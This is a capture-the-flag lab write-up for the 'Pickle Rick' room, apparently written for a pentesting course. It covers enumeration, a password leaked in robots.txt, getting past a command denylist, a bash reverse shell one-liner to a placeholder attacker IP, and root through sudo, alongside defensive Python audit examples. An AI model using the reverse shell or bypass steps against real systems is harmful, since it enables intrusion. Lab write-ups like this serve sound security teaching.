Pickle Rick
A beginner-level, easy Capture The Flag (CTF) that challenges newcomers to solve a variety of tasks using available tools and to hack into a server to steal data. In this post, a course task from HackerU: RED Team Pentester, I will show the steps I followed to get the flag.
Basic checks to be performed before attacking the machine:
1. Power on the target machine and make a note of its IP address.
2. Start your Kali virtual machine.
3. Connect to the TryHackMe OpenVPN.
4. Check connectivity to the target machine from the attacker PC (Kali VM).
Step 1
Nmap (Network Mapper) - Enumeration
Now we will perform a standard nmap scan to discover open ports, the operating system and other information to enumerate further.
- -v: verbose output
- -Pn: skip host discovery and treat all hosts as up
- --reason: show why nmap reports each port as open, closed or filtered, and why the host is marked alive
The scan result shows the following open ports:
- Port 80
- Port 22
It also shows that the host is running Linux.
Step 2
Directory Search Using GoBuster
We are going to use gobuster to try to locate any directories that may have been hidden from us.
Command Breakdown:
-u: Full URL (including scheme), or base domain name.
-w: Path to the wordlist used for brute forcing (use - for stdin).
-x: List of extensions to check for, if any.
It looks like GoBuster was able to find eight (8) directories for us, including robots.txt.
Let's check out login.php, since the nmap scan showed a web service running on port 80.
Though port 22 is open, we would need credentials for it, so let us not mess with it.
Step 3
WebPage
We have a web page, so let us look at the page source to see if anything interesting is available.
We found the username, but we do not have the password yet. In most cases websites have a robots.txt, which tells search engine crawlers which pages or files they can or cannot request from the site.
Let us check whether it is the password to log in. We are able to log in, and the portal takes us to a command panel as shown.
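The lesson from robots.txt here is that anything placed in that file is public, and a line that is not a crawler directive is usually a leftover note. The following checker is an added example, not part of the original write-up or of the challenge; the sample file is constructed (the real file's contents are not reproduced) and the function names are my own. It reports every Disallow path, since those are hidden only from well-behaved crawlers, and every line that is not a recognised directive, comment or blank.

```python
# Added example: audit a robots.txt for information disclosure.
from dataclasses import dataclass, field

# Directives from the robots.txt convention (RFC 9309) plus common
# non-standard ones that crawlers widely honour.
KNOWN_DIRECTIVES = {"user-agent", "disallow", "allow", "sitemap", "crawl-delay", "host"}


@dataclass
class RobotsReport:
    disallowed: list = field(default_factory=list)  # paths hidden from crawlers
    stray: list = field(default_factory=list)       # (line number, text) of non-directive lines


def audit_robots(text: str) -> RobotsReport:
    """Separate real crawler directives from stray lines worth a human look."""
    report = RobotsReport()
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop trailing/whole-line comments
        if not line:
            continue
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() not in KNOWN_DIRECTIVES:
            # Not "Directive: value" -> a note, credential or other leftover.
            report.stray.append((lineno, raw.strip()))
            continue
        if name.strip().lower() == "disallow" and value.strip():
            # Hidden from crawlers, but still fetchable by anyone who reads this file.
            report.disallowed.append(value.strip())
    return report


# Constructed sample, modelled on the kind of file this challenge exposes.
SAMPLE = """\
User-agent: *
Disallow: /admin/
Disallow: /backup.zip
# TODO remove before go-live
SuperSecretPassw0rd
"""

if __name__ == "__main__":
    r = audit_robots(SAMPLE)
    print("Paths hidden from crawlers (still reachable by anyone):", r.disallowed)
    print("Stray lines to review:", r.stray)
```

Run it against your own site's robots.txt during a review: a non-empty stray list is a leaked note until proven otherwise, and every Disallow path should be protected by authentication rather than by the hope that nobody reads the file.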
Now we know who we are and what the IP of the box is. Let us execute basic commands and check what is available in the box.
which python: returns nothing.
which python2: returns nothing.
which python3: available.
which perl: available.
which bash: available.
We can use perl or python to get a reverse shell and then escalate to root access to capture the flag.
The first flag to capture is
What is the first ingredient Rick needs?
Let us first understand which directory we are in. In the command panel type pwd and we can see the current directory.
Let us see if the command "ls -la" returns any data. It does, and we can see the first flag.
When you try cat <File Name>.txt, it throws the error "Command Disabled", but we still need to read the contents of the text file.
We captured the first flag. You can alternatively try "less <something.txt>" to get the flag for the first question.
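The "Command Disabled" message is a denylist on command names, and the fact that less still reads the file shows why a denylist is not a security boundary. Below is an added example, written for this post and not the challenge's own code, that puts a filter modelled on that behaviour beside two allowlist designs: one that maps fixed action names to fixed argument vectors so user text never reaches a shell, and one that serves a "show a file" feature by reading from Python inside a single directory with a containment check. The denied word list and all function names are assumptions.

```python
# Added example: denylist on command names versus allowlist designs.
import os
import shlex
import subprocess

# Assumed list of names the weak filter refuses, modelled on the panel's
# "Command Disabled" response to cat.
DENIED = {"cat", "head", "more", "tail", "nano", "vim"}


def denylist_filter(command_line: str) -> bool:
    """Weak control: allow unless the first word is a denied command name.

    Returns True when the line would be handed to a shell. Any other program
    that reads files (less, among many) passes straight through.
    """
    parts = shlex.split(command_line)
    return bool(parts) and parts[0] not in DENIED


# Hardened design 1: the user picks an action name; the server owns the argv.
ALLOWED_ACTIONS = {
    "whoami": ["whoami"],
    "uptime": ["uptime"],
}


def run_allowed_action(action: str) -> str:
    argv = ALLOWED_ACTIONS.get(action)
    if argv is None:
        raise PermissionError(f"action not permitted: {action!r}")
    # No shell involved: argv goes to execve() as a list, never as a string.
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


# Hardened design 2: if the feature really is "show a file", read it from
# Python inside one fixed directory instead of exposing any command at all.
def read_allowed_file(base_dir: str, name: str) -> str:
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    # Containment check rejects ../ sequences and symlinks that leave base_dir.
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes {base_dir!r}: {name!r}")
    with open(target, encoding="utf-8") as fh:
        return fh.read()


if __name__ == "__main__":
    for cmd in ("cat flag.txt", "less flag.txt"):
        print(f"{cmd!r:16} passes denylist: {denylist_filter(cmd)}")
    print("action whoami ->", run_allowed_action("whoami").strip())
    try:
        read_allowed_file("/var/www/html", "../../../etc/passwd")
    except PermissionError as exc:
        print("rejected:", exc)
```

The detection angle is the same as the design angle: a web application that ever builds a shell command from request parameters should be flagged in code review regardless of how long its blocklist is, because the blocklist only describes the bypasses the developer has already thought of.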
What's the second ingredient Rick needs?
We need root access to capture the second flag. From the earlier command execution, we know that python3, perl or bash can be used for reverse shell access.
Let us google for reverse shell one-liners that can be executed in the command panel, and use netcat on the attacker machine to catch the connection.
bash -c "bash -i >& /dev/tcp/<Attacker Machine IP>/<Port> 0>&1"
Navigate to the home folder and you can find two users, "Rick" and "Ubuntu".
There you can find the answer for the second flag. Alternatively, without a reverse shell, you can get the flag using the command-line option.
You can read more about the "less command".
We have both flags and now need to find the last one. In the terminal, when you type "sudo -l" you get it all: the privilege escalation to the 3rd flag is right in front of you.
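What "sudo -l" hands over on this box is a sudoers rule that is far broader than the service account needs. The following audit function is an added example, not from the original write-up, that reads the text `sudo -l` prints and flags rules granting any command or skipping the password prompt. The sample output is constructed (hostname, user and rules are placeholders, not the challenge machine's real configuration); the second rule in it shows the narrowed form that would pass the check.

```python
# Added example: flag over-broad rules in `sudo -l` output.
import re

# One rule line as `sudo -l` prints it, e.g. "(ALL) NOPASSWD: ALL" or
# "(root) /usr/bin/systemctl restart apache2".
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*"   # (runas_user[ : runas_group])
    r"(?P<tags>(?:[A-Z]+:\s*)*)"     # optional tags such as NOPASSWD:
    r"(?P<cmds>\S.*)$"               # the command list
)


def risky_sudo_rules(sudo_l_output: str) -> list:
    """Return (rule, runas, reasons) for rules that grant broad root access."""
    findings = []
    for raw in sudo_l_output.splitlines():
        m = RULE_RE.match(raw)
        if not m:
            continue  # header lines such as "Matching Defaults entries ..."
        runas, tags, cmds = m["runas"].strip(), m["tags"], m["cmds"].strip()
        reasons = []
        if cmds == "ALL":
            reasons.append("any command")      # no restriction on what runs
        if "NOPASSWD" in tags:
            reasons.append("no password prompt")  # a web shell alone is enough
        if reasons:
            findings.append((raw.strip(), runas, reasons))
    return findings


# Constructed sample; web01, www-data and both rules are placeholders.
SAMPLE = """\
Matching Defaults entries for www-data on web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on web01:
    (ALL) NOPASSWD: ALL
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for rule, runas, reasons in risky_sudo_rules(SAMPLE):
        print(f"{rule}  [runs as {runas}]  -> {', '.join(reasons)}")
```

The fix on the defending side is the one the unflagged rule illustrates: name the exact binary and arguments the account needs, keep the password prompt unless there is a documented reason to drop it, and review the result with `sudo -l -U <user>` after every change.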
With that you are root, and you have the third file that contains the last flag for the machine. It is a very nice challenge with a little bit of twist, and good to get used to :).